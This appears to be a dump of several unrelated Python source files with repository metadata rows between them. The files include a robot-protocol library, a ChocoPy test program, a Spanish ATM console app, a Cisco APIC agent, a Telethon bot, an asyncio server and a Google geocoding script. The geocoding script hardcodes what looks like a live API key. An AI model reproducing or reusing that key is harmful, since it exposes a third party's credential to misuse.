Changes this StateVar's RDIS type.
"""
mapType(newType) ## Asserts that it is a valid RDIS type.
self._type = newType
class Primitive:
def __init__(self, parent=None, pack=None, unpack=None, parameters=[],
regex=None, format=None, name=None, connection=None, formatArgs=[],
postActions=[]):
"""
Constructs a Primitive.
"""
self._parent = parent
self._format = format
self._name = name
self._pack = pack
self._unpack = unpack
self._regex = regex
self._connection = connection
self._parameters = parameters
self._formatArgs = formatArgs
self._postActions = postActions
def call(self, arguments=[]):
"""
Calls a primitive with the provided positional arguments.
"""
env = createEnvironment(self._parameters, arguments)
## Evaluate all the args we send out on the format string.
values = [safeEval(k,env) for k in self._formatArgs]
## Write the information on the connection and read back.
connection = self._getConnection()
connection.write( self._doPack(values) )
out = self._doUnpack( connection )
## Build environments for postActions and execute them.
envs = self._buildPostActionEnv(env, out)
safeExecs(self._postActions, envs[1])
## Delete local variables that we added.
deleteAdditions(envs[0], envs[1])
## Updates stateVar from the global environment.
self._parent._updateStateVarsFromEnvironment(envs[1])
def parameterCount(self):
"""
Returns the number of parameters this Primitive accepts.
"""
return len(self._parameters)
def _buildPostActionEnv(self, parameters, out):
"""
Builds environment for post actions.
"""
globalEnv = self._parent._buildStateVarEnvironment()
globalCopy = dict(globalEnv)
globalCopy.update(parameters)
globalCopy["__out__"] = out
return (globalEnv, globalCopy)
def _getConnection(self):
"""
Gets connection associated with this Primitive.
"""
return self._parent.getConnection(self._connection)
def _doPack(self, values):
"""
Decides whether or not we need to ASCII-encode or byte-pack the values we
are writing to the robot.
"""
if self._format != None:
return bytes(apply(self._format.format, values))
else:
tmp = [str(self._pack)]
tmp.extend(values)
return apply(struct.pack, tmp)
def _doUnpack(self, connection):
"""
Unpacks arguments read from the connection using regular expressions or
struct.unpack().
"""
if self._regex != None:
return re.match(self._regex, str(connection.read())).groups()
elif self._unpack != None:
sz = struct.calcsize(str(self._unpack))
byteSequence = connection.read(sz)
return struct.unpack(str(self._unpack), byteSequence)
class Connection:
"""
Represents the connection from the host application to the robot.
"""
def __init__(self, name, parent):
"""
Constructs a connection.
"""
## TODO: THREADING
self._name = name
self._parent = parent
self._startup = None
self._keepalive = None
self._terminate = None
self._initialized = False
def startup(self):
"""
Initializes the connection if it is uninitialized.
"""
if self._initialized == True: return
self._initialized = True
pass
def tick(self):
"""
Performs any periodic actions needed by this connection.
"""
self.keepalive()
## TODO: Periodic interfaces.
def keepalive(self):
"""
Attempts to call the keepalive if it is past due.
"""
## TODO: obey keepalive frequency
self._callKeepalive()
def _callKeepalive(self):
"""
Calls the keepalive interface.
"""
self._callEventInterface(self._keepalive)
def _callStartup(self):
"""
Calls the startup interface.
"""
self._callEventInterface(self._startup)
def _callTerminate(self):
"""
Calls the termination interface.
"""
self._callEventInterface(self._terminate)
def _callEventInterface(self, i):
"""
Calls a generic eventful interface.
"""
if i == None: return
env = self._parent._buildStateVarEnvironment()
args = safeEvalAll(i['arguments'], env)
self._parent._callInterface(i['name'], args)
def setStartup(self, name, arguments=[]):
"""
Sets the startup interface.
"""
self._startup = {
'name': name,
'arguments': arguments
## TODO: Where is the periodicity?
}
def setTerminate(self, name, arguments=[]):
"""
Sets the terminate interface.
"""
self._terminate = {
'name': name,
'arguments': arguments
}
def setKeepalive(self, name, interval, arguments=[]):
"""
Sets the keepalive interface.
"""
self._keepalive = {
'interval': interval,
'name': name,
'arguments': arguments
}
def write(self, stuff):
"""
Dummy method for writing to an abstract connection. Prints bytes to
stdout.
"""
print "--- WROTE ---"
printBytes(stuff)
def read(self, num):
"""
Dummy method for reading bytes. Returns arbitrary bytes.
"""
print "--- READ ---"
byteSequence = bytes()
for i in range(num):
b = random.randint(0,20)
b = chr(3) if b==0 else chr(0)
byteSequence += b
printBytes(byteSequence)
return byteSequence
class SerialConnection(Connection):
"""
Represents a connection over the serial port.
"""
def __init__(self, baud=9600, name=None, parent=None, singleThreading=None):
"""
Constructs a serial connection.
"""
Connection.__init__(self, name, parent)
self._baud = baud
def startup(self, port='/dev/rfcomm0'):
"""
Opens serial port and calls startup interface.
"""
if self._initialized: return
self._serial = serial.Serial(port=port, baudrate=self._baud)
self._serial.open()
self._initialized = True
self._callStartup()
def terminate(self):
"""
Executes termination interface and closes connection.
"""
self._callTerminate()
self._serial.close()
def write(self, byteSequence):
"""
Writes a byte sequence to the serial port.
"""
self._serial.write(byteSequence)
print "--------- WROTE (serial) ----------"
printBytes(byteSequence)
def read(self, num=1):
"""
Reads a byte sequence from the serial port.
"""
byteSequence = self._serial.read(num)
print "--------- READ (serial) ----------"
printBytes(byteSequence)
return byteSequence
class DomainInterface:
"""
Represents a domain interface.
A domain interface is supposed to be a standardized name and message format
which can pass into the model. It is then normally tied to some local
interface. Domain interfaces have no return values.
"""
def __init__(self,
parent = None,
name=None,
localInterface=None,
interfaceArguments=[],
parameters=[]):
"""
Constructs a domain interface.
A domain interface has some parameters (a set of names) which must be
satisfied by the calling entity. These parameters are then mapped into
arguments that the local interface will accept.
"""
self._parent = parent
self._name = name
self._localInterface = localInterface
self._interfaceArguments = interfaceArguments
self._parameters = parameters
def call(self, givenEnv):
env = dict()
try:
for key in self._parameters:
env[key] = givenEnv[key]
except KeyError as e:
sys.stderr.write("Missing argument for {}: {}\n".format(self._name,str(e)))
return
values = safeEvalAll(self._interfaceArguments,env)
self._parent._callInterface(self._localInterface, values)
class DomainOutput:
def __init__(self,
parent=None,
name=None,
returns=None):
self._parent = parent
self._name = name
self._returns = returns
def call(self):
outMsg = dict(self._returns)
stateVars = self._parent._buildStateVarEnvironment()
for (key, val) in outMsg.items():
outMsg[key] = safeEval(val, stateVars)
self._parent._receiveMessage(self, outMsg)
def getName(self):
return self._name
class Interface:
def __init__(self, parent=None, name=None, type="adhoc", parameters=[],
triggers=None):
self._parent = parent
self._name = name
self._type = type
self._parameters = parameters if parameters != None else []
self._triggers = triggers
self._primitiveCalls = []
def addPrimitiveCall(self, name, arguments, delay=0, priority=0):
self._primitiveCalls.append({
'name': name,
'arguments': arguments,
'delay': delay,
'priority': priority
})
def call(self, arguments):
env = createEnvironment(self._parameters, arguments)
for primCall in sorted(self._primitiveCalls, key=lambda x: x['priority']):
args = safeEvalAll(primCall['arguments'], env)
self._parent._callPrimitive(primCall['name'], args)
time.sleep(primCall['delay'] / 1000.)
if self._triggers != None:
self._parent._callDomainOutput(self._triggers)
|
[
"mahodnett@crimson.ua.edu"
] |
mahodnett@crimson.ua.edu
|
9a3f0834fb8c95c50780b6556f338434afb755ac
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/stdlib-big-2027.py
|
800ffc49d1b9b669601b8019287f65c1ce85377c
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,005
|
py
|
# ChocoPy library functions
def int_to_str(x: int) -> str:
digits:[str] = None
result:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def int_to_str2(x: int, x2: int) -> str:
digits:[str] = None
digits2:[str] = None
result:str = ""
result2:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def int_to_str3(x: int, x2: int, x3: int) -> str:
digits:[str] = None
digits2:[str] = None
digits3:[str] = None
result:str = ""
result2:str = ""
result3:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def int_to_str4(x: int, x2: int, x3: int, x4: int) -> str:
digits:[str] = None
digits2:[str] = None
digits3:[str] = None
digits4:[str] = None
result:str = ""
result2:str = ""
result3:str = ""
result4:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def int_to_str5(x: int, x2: int, x3: int, x4: int, x5: int) -> str:
digits:[str] = None
digits2:[str] = None
digits3:[str] = None
digits4:[str] = None
digits5:[str] = None
result:str = ""
result2:str = ""
result3:str = ""
result4:str = ""
result5:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def str_to_int(x: str) -> int:
result:int = 0
digit:int = 0
char:str = ""
sign:int = 1
first_char:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
digit = 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
def str_to_int2(x: str, x2: str) -> int:
result:int = 0
result2:int = 0
digit:int = 0
digit2:int = 0
char:str = ""
char2:str = ""
sign:int = 1
sign2:int = 1
first_char:bool = True
first_char2:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
digit = 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
def str_to_int3(x: str, x2: str, x3: str) -> int:
result:int = 0
result2:int = 0
result3:int = 0
digit:int = 0
digit2:int = 0
digit3:int = 0
char:str = ""
char2:str = ""
char3:str = ""
sign:int = 1
sign2:int = 1
sign3:int = 1
first_char:bool = True
first_char2:bool = True
first_char3:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
digit = 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
def str_to_int4(x: str, x2: str, x3: str, x4: str) -> int:
result:int = 0
result2:int = 0
result3:int = 0
result4:int = 0
digit:int = 0
digit2:int = 0
digit3:int = 0
digit4:int = 0
char:str = ""
char2:str = ""
char3:str = ""
char4:str = ""
sign:int = 1
sign2:int = 1
sign3:int = 1
sign4:int = 1
first_char:bool = True
first_char2:bool = True
first_char3:bool = True
first_char4:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
digit = 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
def str_to_int5(x: str, x2: str, x3: str, x4: str, x5: str) -> int:
result:int = 0
result2:int = 0
result3:int = 0
result4:int = 0
result5:int = 0
digit:int = 0
digit2:int = 0
digit3:int = 0
digit4:int = 0
digit5:int = 0
char:str = ""
char2:str = ""
char3:str = ""
char4:str = ""
char5:str = ""
sign:int = 1
sign2:int = 1
sign3:int = 1
sign4:int = 1
sign5:int = 1
first_char:bool = True
first_char2:bool = True
first_char3:bool = True
first_char4:bool = True
first_char5:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
digit = 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
# Input parameters
c:int = 42
c2:int = 42
c3:int = 42
c4:int = 42
c5:int = 42
n:int = 10
n2:int = 10
n3:int = 10
n4:int = 10
n5:int = 10
# Run [-nc, nc] with step size c
s:str = ""
s2:str = ""
s3:str = ""
s4:str = ""
s5:str = ""
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
i = -n * c
# Crunch
while i <= n * c:
s = int_to_str(i)
print(s)
i = str_to_int(s) + c
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
ca654d4af8923a06b4bc4ecf85e375843769055d
|
b4dfc245207c58eaf507733968cee3262d63f8e1
|
/Caja.py
|
21c0ba99c2bf920f09c3fc287c64ce68b0dc8e42
|
[] |
no_license
|
nicoadam/atm-python
|
7029df05471febe01d8b48d0fb36b52a1c716652
|
f4fe3f55615e95edef37e706067c9c7a25c11c24
|
refs/heads/main
| 2023-04-14T04:23:13.733255
| 2021-04-25T13:29:30
| 2021-04-25T13:29:30
| 361,435,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,725
|
py
|
import banco
from os import system, path
import time #tiempo del sistema
class Caja(object):
rayas ="*"*100 #rayas
ban = "" # inicializo la variable del objeto banco
def __init__(self):
try:
self.historial = ["****ACCIONES EFECTUADAS****\n"] # titulo de la cabezera del archivo
#path.expanduser me tra el home del usuario
self.archivo = open(path.join(path.expanduser('~'),'Desktop/registro.txt'),'a')
system("clear")
print self.rayas # las rayas
nombre = raw_input("Nombre: ")
cuenta = raw_input("Cuenta: ")
deposito = raw_input("Deposito: ")
self.historial = ["****ACCIONES EFECTUADAS****\n"] # titulo de la cabezera del archivo
self.historial.append("Cliente: " + nombre+'\n') # agregro el cliente la lista del historial
self.historial.append("Cuenta: "+ cuenta+'\n') #agrego la cuenta en la lista
self.historial.append("Deposito Inicial: "+ deposito+'\n\n') # agrego el deposito en la lista
if str(nombre) != "" and str(cuenta) != "" and int(deposito) > 0: #aseguro que dijito datos
# construllo el objeto banco con los valores el cliente
self.ban = banco.Banco(nombre,cuenta,deposito)
#muesto el menu de opciones
self.menu()
else:
print "datos incorrectos dijite datos"
except ValueError:
print "error en los datos \ndigite los datos corecctos"
def menu(self):
print "\n\n\n"
print self.rayas
print "****************Menu de opciones:*********************\n"
try:
opcion = raw_input("QUE DESEA Hacer:\n1-) Consultar Balance\n2-) Comprar Targeta\n3-) Hacer retiro\n4-) Depositar\n5-) Salir\n Elija un numero# ")
if int(opcion) == 1: # balance inquiry
system("clear")
self.Consultar_balance()
self.transaccion('Consulta')
self.menu()
elif int(opcion) == 2: # card purchase
system("clear")
self.comprar_targeta(raw_input("cantida de recarga $..... ")) # comprar_targeta method
self.transaccion('Compra')
self.menu()
elif int(opcion) == 3: # withdrawal
system("clear")
self.hacer_retiro(raw_input("**#Cantidad de retiro $..... ")) # hacer_retiro method
self.transaccion('Retiro')
self.menu()
elif int(opcion) == 4: # deposit
system("clear")
self.hacer_deposito(raw_input('$Cantidad a depositar\n.....')) # hacer_deposito method
self.transaccion('Deposito')
self.menu()
elif int(opcion) == 5: # exit the program
for reg in self.historial:
self.archivo.writelines(reg) # write out the entries stored in the history list
self.archivo.flush()
self.archivo.close()
print "bye"
exit()
else:
system("clear")
print "ELIJA UNA DE LAS OPCIONES\n\n"
self.menu()
except ValueError:
print "Error Elija solo numeros"
self.menu()
def Consultar_balance(self):
try:
if self.ban.getMonto() > 0: # check the amount is greater than 0, i.e. there is a balance
print("**SU BALANCE ES DE $ " + str(self.ban.getMonto()) +" RD")
except Exception, e:
print ("error: " + str(e))
def comprar_targeta(self,dinero):
try:
if int(dinero) > 0: # check that money was entered
self.ban.targeta(dinero) # the bank performs the transaction
except Exception, e:
print ("error" + str(e))
def hacer_retiro(self,dinero):
try:
self.ban.retiro(dinero) # call Banco's retiro function
except Exception, e:
print "error: " + str(e)
def hacer_deposito(self,dinero):
try:
self.ban.depositar(dinero)
except Exception, e:
print "error: " + str(e)
def transaccion(self,accion):
try:
self.historial.append(str(accion)+' a las '+str(time.ctime(time.time())) + "\n") # ctime converts the seconds from time() into a string
except Exception, e:
print "error: " + str(e)
self.archivo.close()
ca =Caja()
|
[
"edgar1391@gmail.com"
] |
edgar1391@gmail.com
|
9bf056a7cf20339db644c6a71488458cca6aa0c0
|
b9e64241fb706cbee4523275bbfc3cbf339d4014
|
/hostagent.py
|
c1948e9963ec3b55b54eccc0f05a6d8d26df93c3
|
[] |
no_license
|
kecorbin/apicserviceagent
|
89e535b557367bdc20098c5c4371576e39bc4344
|
f101a384d50a9b7747f676b976d827db7041b7e2
|
refs/heads/master
| 2021-01-19T07:58:33.088437
| 2014-12-07T20:49:37
| 2014-12-07T20:49:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,523
|
py
|
#!/usr/bin/env python
import cobra.mit.access
import cobra.mit.session
import cobra.mit.request
import cobra.model.fv
from cobra.mit.request import DnQuery, ClassQuery
class Agent:
def __init__(self, host, user, passwd):
self.host = host
self.user = user
self.passwd = passwd
self.ls = cobra.mit.session.LoginSession(self.host, self.user, self.passwd)
self.md = cobra.mit.access.MoDirectory(self.ls)
self.md.login()
def list_services(self):
services_list = []
for service in self.md.lookupByClass('vzBrCP'):
services_list.append(str(service.dn))
return services_list
def endpointbyip(self, ip):
"""
:param ip: string IP address
:return: fvCEp object
"""
c = ClassQuery('fvCEp')
c.propFilter = 'and(eq(fvCEp.ip, "%s"))' % ip
dn = self.md.query(c)
if len(dn) > 1:
raise ValueError('More than one CEP with IP address')
else:
return dn[0].dn
def ip_provides(self, ip):
"""
:param ip:
:return:
"""
mydn = self.endpointbyip(ip)
myparent = self.md.lookupByDn(mydn).parentDn
myprovidedsvcs = self.epg_provides(myparent)
return myprovidedsvcs
def ip_consumes(self, ip):
"""
:param ip: string IP address
:return: list of string dn's
"""
mydn = self.endpointbyip(ip)
myparent = self.md.lookupByDn(mydn).parentDn
myprovidedsvcs = self.epg_consumes(myparent)
return myprovidedsvcs
def whoisproviding(self, servicedn):
"""
:param servicedn:
:return:
"""
providers = self.md.lookupByClass('fvRsProv', propFilter='and(eq(fvRsProv.tDn,"%s"))' % servicedn)
provider_list = []
for provider in providers:
provider_list.append(str(provider.parentDn))
return provider_list
def whoisconsuming(self, servicedn):
"""
Returns a list of the consumers of the given contract.
:param servicedn:
:return:
"""
consumers = self.md.lookupByClass('fvRsCons', propFilter='and(eq(fvRsCons.tDn,"%s""))' % servicedn)
consumer_list = []
for consumer in consumers:
consumer_list.append(str(consumer))
return consumer_list
def epg_provides(self, epg):
q = DnQuery(epg)
q.queryTarget = 'children'
q.subtree = 'full'
q.classFilter = 'fvRsProv'
children = self.md.query(q)
provided = []
for contract in children:
provided.append(contract.tDn)
return provided
def epg_consumes(self, epg):
q = DnQuery(epg)
q.queryTarget = 'children'
q.subtree = 'full'
q.classFilter = 'fvRsCons'
children = self.md.query(q)
consumedsvcs = []
for contract in children:
consumedsvcs.append(contract.tDn)
return consumedsvcs
def epg_endpoints(self, epg):
q = DnQuery(epg)
q.queryTarget = 'children'
q.subtree = 'full'
q.classFilter = 'fvCEp'
children = self.md.query(q)
endpoints = []
for ep in children:
endpoints.append(ep.ip)
return endpoints
def consumeservice(self, dn, contractdn, svcflag):
"""
:param dn: dn of epg
:param contractdn: dn of contract
:param svcflag: boolean add/delete fvRsCons
:return:
"""
epg, contract = self.md.lookupByDn(dn), self.md.lookupByDn(contractdn)
if svcflag:
fvrscons = cobra.model.fv.RsCons(epg, tnVzBrCPName=contract.name)
else:
fvrscons = cobra.model.fv.RsCons(epg, tnVzBrCPName=contract.name).delete()
c1 = cobra.mit.request.ConfigRequest()
c1.addMo(epg)
self.md.commit(c1)
return fvrscons
def provideservice(self, dn, contractdn, svcflag):
"""
:param dn: dn of epg
:param contractdn: dn of contract
:param svcflag: boolean add/delete fvRsProv
:return:
"""
epg, contract = self.md.lookupByDn(dn), self.md.lookupByDn(contractdn)
if svcflag:
fvrsprov = cobra.model.fv.RsProv(epg, tnVzBrCPName=contract.name)
else:
fvrsprov = cobra.model.fv.RsProv(epg, tnVzBrCPName=contract.name).delete()
c1 = cobra.mit.request.ConfigRequest()
c1.addMo(epg)
self.md.commit(c1)
return fvrsprov
|
[
"kecorbin@cisco.com"
] |
kecorbin@cisco.com
|
b69c8df05efb1c946c2379bbb3a7cbafc5a010d9
|
72a934f4940c4ae77682d45a2d1e8ec5b1e2ff01
|
/venv/Scripts/pip3.8-script.py
|
f2b389e665b291cb3dc3f058d36bb6b6941f01e1
|
[] |
no_license
|
dhaval-jain/g1
|
5347160fcf4efc21207fdf9f996a10dd4e0f61e9
|
a6d4deb672204b9eaf1efc5c6e0c12f38b5bb906
|
refs/heads/master
| 2023-03-18T22:49:03.559327
| 2020-11-17T16:59:50
| 2020-11-17T16:59:50
| 346,329,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
py
|
#!C:\Users\meow\PycharmProjects\project1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
|
[
"inexorable619@gmail.com"
] |
inexorable619@gmail.com
|
c65e687f2a60aec60f86c88a817f06b916bede1a
|
2c5b8e18262c3db5fadf30a692a525224479c1ec
|
/medium_config.py
|
3e269c2792d2f714245da3a066f127434d672152
|
[] |
no_license
|
psaletan/hugo2medium
|
bb2c011eaf72a53299dfcd884720d95cfb262f9c
|
e194af6c74decd60d896f86add53d16e21a26f12
|
refs/heads/master
| 2020-03-08T21:31:54.633665
| 2018-04-06T14:52:23
| 2018-04-06T14:52:23
| 128,408,235
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
"""medium_config.py
configuration for publishing a Hugo post to Medium
"""
# Medium settings
MEDIUM_USERNAME = "paul.saletan"
MEDIUM_PUBLISH_URL = "https://medium.com"
DEFAULT_TITLE = "My Title"
PUBLISH_STATUS = "draft"
# Hugo settings
# Where markdown files are located
DEFAULT_LOCAL_DIRECTORY = '/home/paul/site/hugo/tech/content/posts'
# For providing a link/attribution to the original Hugo post
INCLUDE_ATTRIBUTION = True
ORIGINAL_DOMAIN_NAME = "tech.surveypoint.com"
ORIGINAL_DOMAIN_URL = "https://tech.surveypoint.com"
ORIGINAL_DOMAIN_DIRECTORY = "posts"
ATTRIBUTION_TEMPLATE = "Originally published at [" + ORIGINAL_DOMAIN_NAME \
+ "](" + ORIGINAL_DOMAIN_URL + "/" + ORIGINAL_DOMAIN_DIRECTORY \
+ "/" + "$$POST_LINK$$/) on $$POST_DATE$$."
# Translation table: removes certain characters from Hugo tags
META_TRANS_TABLE = str.maketrans(dict.fromkeys(' "[]'))
IGNORE_LINES_CONTAINING = [ '<img ', '"caption"' ]
|
[
"psaletan@gmail.com"
] |
psaletan@gmail.com
|
b0fda62c91e2ef2f82de42bc419511c8207e287d
|
a2dbf96b1fc3329a296b9f338b94bac9b880d85c
|
/call_api.py
|
6a0a19d647923ae367a3e41151000a56bdd8fb22
|
[] |
no_license
|
shishirmax/py
|
830894e4ca48d5e3e3eb732e64e36d1cc9f2658a
|
3eaa8564f4532c460d78162d965d7905d7840918
|
refs/heads/master
| 2022-02-28T09:10:05.269671
| 2019-10-14T11:20:26
| 2019-10-14T11:20:26
| 109,232,985
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
import requests
import json
api_key = "AIzaSyBEQyAbIVXfGTSbLr_S-HUpSZoxfoBbc5I"
strAdd = "0 State Highway 99"
strCity = " Montgomery Twp"
strState = " "
strZip = "56069"
complete_address = strAdd+strCity+strState+strZip
url = "https://maps.googleapis.com/maps/api/geocode/json?address="+complete_address+"&key=AIzaSyBEQyAbIVXfGTSbLr_S-HUpSZoxfoBbc5I"
api_response = requests.get(url)
api_response.status_code
api_response.headers['content-type']
api_response.encoding
api_response.json()
json_r = api_response.json()
json_str = json.dumps(json_r)
parsed_json = json.loads(json_str)
print("Original Address: ",complete_address)
#this gives the formatted address
print("Formatted Address: ",parsed_json['results'][0]['formatted_address'])
#this gives the latitude
print("Latitude: ",parsed_json['results'][0]['geometry']['location']['lat'])
#this gives the longitude
print("Longitude: ",parsed_json['results'][0]['geometry']['location']['lng'])
|
[
"shishirmax@gmail.com"
] |
shishirmax@gmail.com
|
652e5faa14374b2c8acb1e848e42cfc2a960f2ff
|
78e1b2b293acca855508cbe69ade1c530fa4b676
|
/06_with_logging.py
|
9dcc41fc213610c0fcb0f485ca1a9e908bf05735
|
[] |
no_license
|
mfonism/learn-telethon
|
c9597d3a20e0e12db7c0165c6a122a8f44933fc6
|
6eb49e20df33e4a668f225212f8945475b316822
|
refs/heads/master
| 2022-12-13T15:33:20.561060
| 2020-02-11T14:05:22
| 2020-02-11T14:05:22
| 239,226,974
| 0
| 0
| null | 2022-11-22T05:18:05
| 2020-02-09T00:58:13
|
Python
|
UTF-8
|
Python
| false
| false
| 476
|
py
|
import logging
from telethon import TelegramClient, events
import settings
logging.basicConfig(
format="[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s", level=logging.WARNING
)
client = TelegramClient(
settings.USER_SESSION_FILENAME, settings.API_ID, settings.API_HASH
)
@client.on(events.NewMessage)
async def my_event_handler(event):
if "Kiwi" in event.raw_text:
await event.reply("Yas, boo!")
client.start()
client.run_until_disconnected()
|
[
"mfonetimfon@gmail.com"
] |
mfonetimfon@gmail.com
|
f408c17757ab32b3fb0706b8702baaa29e7c3158
|
dec67195d506a847ff876deb0d33972f18170b5a
|
/coroutine_asyncio_serv.py
|
5f45978297c19e9790ac24d64a0dcbca6a36cf89
|
[] |
no_license
|
madomdy/simple_servers
|
dc1f4e433684ea20c9a44b48cd1a3e9fedb234d7
|
83edfd9fb8f540d64787a41e21e77cba5c5ec367
|
refs/heads/master
| 2020-07-15T10:23:46.243124
| 2016-12-28T17:30:48
| 2016-12-28T17:30:48
| 73,964,545
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,089
|
py
|
import asyncio, zen_utils
@asyncio.coroutine
def handle_conversation(reader, writer):
address = writer.get_extra_info('peername')
print('Accepted connection from {}'.format(address))
while True:
data = b''
while not data.endswith(b'?'):
more_data = yield from reader.read(4096)
if not more_data:
if data:
print('Client {} sent {!r} but then closed'.
format(address, data))
else:
print('Client {} closed socket normally'.format(address))
return
data += more_data
answer = zen_utils.get_answer(data)
writer.write(answer)
if __name__ == '__main__':
address = zen_utils.parse_command_line('asyncio using coroutine')
loop = asyncio.get_event_loop()
coro = asyncio.start_server(handle_conversation, *address)
server = loop.run_until_complete(coro)
print('Listening at {}'.format(address))
try:
loop.run_forever()
finally:
server.close()
loop.close()
|
[
"omar.shikhkerimov@gmail.com"
] |
omar.shikhkerimov@gmail.com
|
f17d81c395fa825f2af97515f5e18aa4f402bc20
|
d7787de97e8969244c5179f253422adc20139ecc
|
/pystim/io/csv.py
|
2f51220754a4b304cc6f45636d4742662a874015
|
[
"MIT"
] |
permissive
|
balefebvre/pystim
|
1a731fab9efdcd72ba627f598a4c62dea13c6b36
|
ae51d8a4b478da6dec44b296407099c6257fa3fa
|
refs/heads/master
| 2021-06-30T07:56:12.652247
| 2019-05-23T15:42:25
| 2019-05-23T15:42:25
| 156,358,798
| 0
| 0
|
MIT
| 2019-05-23T15:42:27
| 2018-11-06T09:28:44
|
Python
|
UTF-8
|
Python
| false
| false
| 924
|
py
|
import pandas as pd
def open_file(path, columns=[], dtype=None):
file = CSVFile(path, columns=columns, dtype=dtype)
return file
def load_file(path, expected_columns=None):
dataframe = pd.read_csv(path, index_col=0)
if expected_columns is not None:
columns = dataframe.columns.values.tolist()
for expected_column in expected_columns:
assert expected_column in columns, "column '{}' missing in file://{}".format(expected_column, path)
return dataframe
class CSVFile:
def __init__(self, path, columns=[], dtype=None):
self._path = path
self._columns = columns
self._dtype = dtype
self._list = []
def append(self, **kwargs):
self._list.append(kwargs)
return
def close(self):
df = pd.DataFrame(self._list, columns=self._columns, dtype=self._dtype)
df.to_csv(self._path)
return
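
# Minimal usage sketch (added for illustration, not part of the original module):
# the file name 'example.csv' and the column names are placeholders.
if __name__ == '__main__':
    writer = open_file('example.csv', columns=['trial', 'duration'])
    writer.append(trial=0, duration=1.5)
    writer.append(trial=1, duration=2.0)
    writer.close()  # writes the accumulated rows out to 'example.csv'
    df = load_file('example.csv', expected_columns=['trial', 'duration'])
    print(df)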
|
[
